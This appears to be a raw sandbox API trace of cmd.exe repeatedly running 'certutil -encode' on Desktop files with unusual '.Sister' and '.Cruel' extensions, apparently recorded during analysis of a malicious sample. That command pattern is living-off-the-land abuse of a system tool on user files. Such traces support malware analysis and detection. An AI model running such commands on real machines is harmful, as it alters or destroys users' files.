lpBuffer=0x21ed92a1080, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0226.075] SetErrorMode (uMode=0x0) returned 0x1 [0226.075] GetProcessHeap () returned 0x21ed8c70000 [0226.075] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92a1070, Size=0x52) returned 0x21ed92a1070 [0226.075] GetProcessHeap () returned 0x21ed8c70000 [0226.075] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92a1070) returned 0x52 [0226.075] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0226.075] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0226.075] GetProcessHeap () returned 0x21ed8c70000 [0226.075] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5fbb0 [0226.075] GetProcessHeap () returned 0x21ed8c70000 [0226.075] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8c75fd0 [0226.075] GetProcessHeap () returned 0x21ed8c70000 [0226.075] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c75fd0, Size=0x1be) returned 0x21ed8c75fd0 [0226.076] GetProcessHeap () returned 0x21ed8c70000 [0226.076] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c75fd0) returned 0x1be [0226.076] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0226.076] GetProcessHeap () returned 0x21ed8c70000 [0226.076] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed9980da0 [0226.076] GetProcessHeap () returned 0x21ed8c70000 [0226.076] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9980da0, Size=0x7e) returned 0x21ed9980da0 [0226.076] GetProcessHeap () returned 0x21ed8c70000 [0226.076] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9980da0) returned 0x7e [0226.076] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0226.076] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0226.076] GetLastError () returned 0x2 [0226.076] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0226.077] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0226.077] GetLastError () returned 0x2 [0226.077] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0226.077] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d060 [0226.077] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0226.077] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0226.078] GetLastError () returned 0x2 [0226.078] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cee0 [0226.078] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0226.078] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0226.078] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0226.078] ??_V@YAXPEAX@Z () returned 0x1 [0226.078] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0226.079] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0226.079] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0226.079] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0226.079] GetProcessHeap () returned 0x21ed8c70000 [0226.079] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45cb0 [0226.079] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0226.079] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0226.079] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0226.079] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0226.079] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0226.079] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0226.079] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0226.079] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0226.079] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0226.079] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0226.079] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0226.079] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0226.079] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0226.079] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0226.080] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0226.081] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0226.081] GetProcessHeap () returned 0x21ed8c70000 [0226.081] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45cb0) returned 1 [0226.081] GetProcessHeap () returned 0x21ed8c70000 [0226.081] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95ba0 [0226.081] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0226.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.081] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0226.081] _get_osfhandle (_FileHandle=0) returned 0x4c [0226.081] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0226.082] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"hvO9HhgzXnxX2Pa-RAL.mp4.Sister\" \"hvO9HhgzXnxX2Pa-RAL.mp4.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"hvO9HhgzXnxX2Pa-RAL.mp4.Sister\" \"hvO9HhgzXnxX2Pa-RAL.mp4.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"hvO9HhgzXnxX2Pa-RAL.mp4.Sister\" \"hvO9HhgzXnxX2Pa-RAL.mp4.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x5b8, dwThreadId=0xa80)) returned 1 [0226.096] CloseHandle (hObject=0xa4) returned 1 [0226.096] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0226.096] GetProcessHeap () returned 0x21ed8c70000 [0226.096] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0226.096] GetEnvironmentStringsW () returned 0x21ed93b0130* [0226.096] GetProcessHeap () returned 0x21ed8c70000 [0226.096] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed9980080 [0226.097] FreeEnvironmentStringsA (penv="=") returned 1 [0226.097] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0226.617] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0226.617] CloseHandle (hObject=0xa8) returned 1 [0226.617] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0226.617] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0226.617] GetProcessHeap () returned 0x21ed8c70000 [0226.617] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0226.617] GetEnvironmentStringsW () returned 0x21ed9980080* [0226.617] GetProcessHeap () returned 0x21ed8c70000 [0226.617] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0226.617] FreeEnvironmentStringsA (penv="=") returned 1 [0226.617] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0226.617] GetProcessHeap () returned 0x21ed8c70000 [0226.618] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0226.618] GetEnvironmentStringsW () returned 0x21ed93b0130* [0226.618] GetProcessHeap () returned 0x21ed8c70000 [0226.618] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed9980080 [0226.618] FreeEnvironmentStringsA (penv="=") returned 1 [0226.618] GetProcessHeap () returned 0x21ed8c70000 [0226.618] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95ba0) returned 1 [0226.618] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0226.618] ??_V@YAXPEAX@Z () returned 0x1 [0226.618] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc2bba0, ftCreationTime.dwHighDateTime=0x1d5f00b, ftLastAccessTime.dwLowDateTime=0xf22a9ec0, ftLastAccessTime.dwHighDateTime=0x1d5ef71, ftLastWriteTime.dwLowDateTime=0xf22a9ec0, ftLastWriteTime.dwHighDateTime=0x1d5ef71, nFileSizeHigh=0x0, nFileSizeLow=0x15b63, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="i6gjWm0aNWU1xM.swf.Sister", cAlternateFileName="")) returned 1 [0226.618] GetProcessHeap () returned 0x21ed8c70000 [0226.618] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0c80, Size=0x2e8) returned 0x21ed93b0c80 [0226.618] GetProcessHeap () returned 0x21ed8c70000 [0226.618] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0c80) returned 0x2e8 [0226.618] GetProcessHeap () returned 0x21ed8c70000 [0226.618] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d686b0 [0226.618] GetProcessHeap () returned 0x21ed8c70000 [0226.618] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d686b0, Size=0x58) returned 0x21ed8d686b0 [0226.618] GetProcessHeap () returned 0x21ed8c70000 [0226.618] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d686b0) returned 0x58 [0226.618] GetProcessHeap () returned 0x21ed8c70000 [0226.618] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68720 [0226.618] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0226.619] GetProcessHeap () returned 0x21ed8c70000 [0226.619] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x44) returned 0x21ed8c7bf80 [0226.619] ??_V@YAXPEAX@Z () returned 0x1 [0226.619] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0226.619] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ce20 [0226.619] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0226.619] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0226.619] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0226.619] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb1a53316, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb1a53316, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7ca60 [0226.619] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0226.619] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\i6gjWm0aNWU1xM.swf.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc2bba0, ftCreationTime.dwHighDateTime=0x1d5f00b, ftLastAccessTime.dwLowDateTime=0xf22a9ec0, ftLastAccessTime.dwHighDateTime=0x1d5ef71, ftLastWriteTime.dwLowDateTime=0xf22a9ec0, ftLastWriteTime.dwHighDateTime=0x1d5ef71, nFileSizeHigh=0x0, nFileSizeLow=0x15b63, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="i6gjWm0aNWU1xM.swf.Sister", cAlternateFileName="I6GJWM~1.SIS")) returned 0x21ed8c7ce80 [0226.620] FindClose (in: hFindFile=0x21ed8c7ce80 | out: hFindFile=0x21ed8c7ce80) returned 1 [0226.620] _wcsnicmp (_String1="I6GJWM~1.SIS", _String2="i6gjWm0aNWU1xM.swf.Sister", _MaxCount=0x19) returned 78 [0226.620] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0226.620] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0226.620] GetProcessHeap () returned 0x21ed8c70000 [0226.620] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8d10 [0226.620] ??_V@YAXPEAX@Z () returned 0x1 [0226.620] ??_V@YAXPEAX@Z () returned 0x1 [0226.620] GetProcessHeap () returned 0x21ed8c70000 [0226.620] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68720, Size=0x210) returned 0x21ed8d68720 [0226.620] GetProcessHeap () returned 0x21ed8c70000 [0226.620] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68720) returned 0x210 [0226.620] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0226.620] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.620] GetFileType (hFile=0x50) returned 0x2 [0226.620] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.620] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0226.621] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.621] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0226.626] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0226.626] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0226.626] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0226.626] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0226.626] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.626] GetFileType (hFile=0x50) returned 0x2 [0226.626] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.626] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0226.627] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.627] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0226.627] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.627] GetFileType (hFile=0x50) returned 0x2 [0226.627] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.627] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0226.628] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.628] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d686c0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d686c0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0226.628] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"i6gjWm0aNWU1xM.swf.Sister\" \"i6gjWm0aNWU1xM.swf.Cruel\" ") returned 64 [0226.628] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.628] GetFileType (hFile=0x50) returned 0x2 [0226.628] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.628] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0226.628] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.629] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x40, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x40) returned 1 [0226.629] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0226.629] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.629] GetFileType (hFile=0x50) returned 0x2 [0226.629] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.629] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0226.629] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.629] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0226.640] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0226.640] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0226.640] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0226.640] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0226.641] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0226.641] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0226.641] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0226.641] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0226.641] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0226.641] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0226.641] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0226.641] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0226.641] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0226.641] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0226.641] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0226.641] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0226.641] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0226.641] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0226.641] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0226.641] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0226.641] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0226.641] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0226.641] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0226.641] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0226.641] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0226.641] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0226.641] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0226.641] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0226.641] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0226.642] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0226.642] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0226.642] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0226.642] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0226.642] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0226.642] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0226.642] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0226.642] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0226.642] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0226.642] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0226.642] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 